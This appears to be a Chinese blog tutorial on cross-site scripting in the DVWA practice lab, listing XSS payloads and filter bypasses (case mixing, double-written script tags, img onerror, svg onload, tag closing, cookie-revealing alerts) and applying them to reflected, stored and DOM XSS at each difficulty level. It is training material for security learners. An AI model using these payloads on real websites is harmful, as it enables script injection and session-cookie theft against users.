目录

XSS(跨站脚本攻击)

payload

1、反射型XSS

2、存储型XSS

3、DOM型xss


XSS(跨站脚本攻击)

payload

<script>alert("xss success!")</script>

<script>alert(document.cookie)</script> 弹窗cookie

<Script>alert("xss success!")</script> 大小写混淆绕过<script>标签限制

<s<script>cript>alert("xss success!")</sc<script>ript> 双写<script>标签绕过

<iframe src="https://www.baidu.com" name="xss" width="1000px height="1500px"></iframe>

使用iframe标签嵌入网页

<img src=1 οnerrοr=alert("xsssuccess!")> 利用图片报错信息

<svg οnlοad=alert("xsssuccess!")> 利用svg标签 onload

#<script>alert("xss success!")</script> 利用注释绕过限制

xss</select><img src=1 οnerrοr=alert("xsssuccess!")> 闭合标签绕过限制

1、反射型XSS

(1)low

1、进入靶场,找到XSS Reflected,级别调到low级别

2、查看源代码发现没有任何过滤和防护措施,可以直接上payload

3、<script>alert("xss success!")</script>

4、<script>alert(document.cookie)</script>

(2)Medium

1、使用弹框payload进行XSS,发现代码输出到屏幕上,并没有执行

2、查看源代码,发现代码把<script>标签过滤了

3、大写<Script>标签进行绕过,<Script>alert("xss success!")</script>

4、成功进行XSS

5、也可以使用双写script标签的方法,绕过限制 <s<script>cript>alert("xss success!")</sc<script>ript>

(3)High

1、使用常规payload进行XSS,<script>alert("xss success!")</script>,没有成功,只显示了一个>

2、使用大小写绕过,<Script>alert("xss success!")</script>,结果一样

3、查看源代码,发现是将script标签中的字母全部替换成了空,script标签已经无法使用了

preg_replace 函数执行一个正则表达式的搜索和替换。

4、无法使用script标签就使用其他标签进行,使用iframe嵌入网页

<iframe src="https://www.baidu.com" name="xss" width="1000px height="1500px"></iframe>

可以发现代码已经执行,这里只不过被firefox给拦截了

5、使用img标签,利用图片报错信息进行XSS,<img src=1 οnerrοr=alert("xsssuccess!")>,这个payload中的提示语不能有空格

6、使用svg标签 <svg οnlοad=alert("xsssuccess!")>

impossible

通过多层验证和过滤不存在xss

2、存储型XSS

payload

(1)low

1、先测试一下

2、上payload,发现第一个提交框有长度限制,把长度值改的大一些

3、继续使用payload,<script>alert("xss success!")</script>

4、成功XSS

5、测试第二个提交框是否存在xss

6、成功xss

7、从其他页面在切换到此页面的时候,仍然会弹出xss弹窗,这就是存储型的xss具有持久性,如果不清楚数据库中的代码这个xss攻击将会一直存在

(2)medium

1、正常注入xss代码,发现代码被输出

2、查看源代码,发现message字段不存在注入,而name字段只是过滤了<script>标签

3、利用大小写混淆绕过限制,或者双写script标签

<Script>alert("xss success!")</script>

<s<script>cript>alert("xss success!")</sc<script>ript>

(3)high

1、正常注入是肯定不行了,直接查看源代码,发现只能从name字段注入,而且不能使用<script>标签,这时就想着使用<iframe> <img><svg>等标签

2、使用img标签

<img src=1 οnerrοr=alert("xsssuccess")>

3、使用iframe标签

<iframe src="https://www.baidu.com" name="xss" width="1000px height="1500px"></iframe>

(4)impossible

1、调到impossible级别后发现即使是存储型的xss也不再存在前面几个级别的弹窗,说明无注入点

3、DOM型xss

DOM(Document Object Model文档对象模型),DOM型xss是一种特殊类型的反射型xss,只不过它不用与服务端交互,它发生在客户端数据处理过程中。

(1)low

1、查看源码,发现无任何防护、过滤措施,直接在url中注入代码

2、<script>alert("xss success!")</script>XSS成功

(2)medium

1、直接注入js代码,没有任何反应

2、查看源代码,使用了stripos过滤<script,且不区分大小写,

3、无论是双写还是大小写都没有用了,查看一下前端代码,发现使用的是<select>和<option>标签

4、可以利用标签闭合,在接上payload来执行xss

(3)high

1、查看源码

2、使用注释绕过后端代码,不经过服务器而是直接浏览器执行注释的内容

#<script>alert("xss success!")</script>

(4)impossible

查看源码,不需要任何防护保护在客户端

DVWA靶场 XSS相关推荐

  1. 【CSRF02】跨站请求伪造——DVWA靶场实操(含CSRF+XSS协同攻击实验)

    目录 1 实验简介 1.1 实验目的 1.2 实验环境 2 Low难度 2.1 前戏 2.2 实验步骤 2.3 代码审计 3 Medium难度 3.1 前戏 3.2 实验思路 3.3 方法一:诱导点击 ...

  2. dvwa靶场的简单练习

    此文章仅为记录自己打靶场的过程 一.dvwa靶场的搭建 (1)phpstudy的下载安装以及配置 下载phpstudy,官网链接:小皮面板(phpstudy) - 让天下没有难配的服务器环境! (xp ...

  3. DVWA靶场环境搭建_SQL注入模拟靶机

    今天讲DVWA的两个重要方面:DVWA靶场环境搭建以及SQL注入模拟靶机 DVWA介绍:在近些年网络安全的高速发展中,初学者已经很难找到一个网站进行渗透了,曾几何时,一个漏洞,一个工具就可以在网上找到 ...

  4. Linux Podman安装DVWA靶场环境

    一.DVWA靶场环境简介 1.DVWA一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范 ...

  5. DVWA靶场通关笔记

    文章目录 Brute Force 暴力破解 Low Medium High Impossible 防护总结: Command Injection 命令注入 危害: Low Medium High Im ...

  6. DVWA靶场——下载与安装(全)

    下载地址 GitHub地址:https://github.com/digininja/DVWA 靶场介绍 DVWA是一款适合入门渗透测试的靶场,用来学习和熟悉技术所用到的,所以包含的漏洞类型比较全面, ...

  7. DVWA靶场系列1-环境搭建

    文章目录 前言 一.DVWA是什么? 二.Kali2022.2下安装 检查完善 前言 基于Kali2022.2搭建的DVWA靶场环境 一.DVWA是什么? https://github.com/dig ...

  8. DVWA测试XSS跨站脚本攻击三种类型

    Xss主要分为三类,反射型,DOM型.存储型. 反射型 反射型XSS的定义是.如果URL地址当中的恶意参数会直接被输出到页面中,导致攻击代码被触发,便称之为反射型XSS,如下图所 DOM型 DOM X ...

  9. DVWA之XSS (完整版)

    List item DVWA之XSS 文章目录 DVWA之XSS *Reflected XSS* Security Level: Low Security Level: Medium 1.双写绕过 2 ...

最新文章

  1. 在监视器(Monitor)内部,是如何做线程同步的?程序应该做哪种级别的同步?
  2. window .bat
  3. redis的redisvCommand的%b
  4. 初学C语言,你的“行囊”需要准备什么呢?
  5. 2018程序员不能错过的编程挑战网站 Top10
  6. apache.camel_Apache Camel 3.1 – XML路由的快速加载
  7. mysql 安装盒子_Windows2008 装 MySQL 问题
  8. 前端学习(1707):前端系列javascript之promise
  9. 人之间的尊重是相互的_人与人之间真心是互换的尊重是相互的
  10. 3个原因告诉你,为什么选择HTML5大前端?
  11. 在eclipse中运行 carrot2 workbench
  12. 1400+款调色预设LR/PS/PR/FCPX/达芬奇lightroom滤镜LUT素材
  13. SI24R2H_2.4GHz无线发射与125KHZ接收一体芯片
  14. Java整合ORC识别验证码
  15. Keil黑色背景页面设置
  16. 【檀越剑指大厂--mysql】mysql基础篇
  17. 超越Framer的基础知识
  18. linux ssd iops测试,Linux系统硬盘的IOPS测试
  19. 索尼Android电视 安装第三方软件,解答索尼电视如何安装第三方软件
  20. python推荐引擎_THUDataPITranslation

热门文章

  1. keyevent常用键列表
  2. 别再恐惧 IP 协议(万字长文 | 多图预警)
  3. ArrayList常见练习题解析
  4. python更改保存路径,Jupyter Notebook更改保存文件的默认路径(方法汇总,亲测有效)...
  5. android 低电量卡,Android11 增加低电量通知
  6. 键盘与电脑识别问题?
  7. 为触屏手机而设计系列1——拇指操作的“热区/死角”与“控件尺寸”
  8. pyinstaller 打包exe 防反编译(加密)
  9. orale数据库的SQL查询
  10. 高等数学(拉格朗日乘子法):NOI 2012 骑行川藏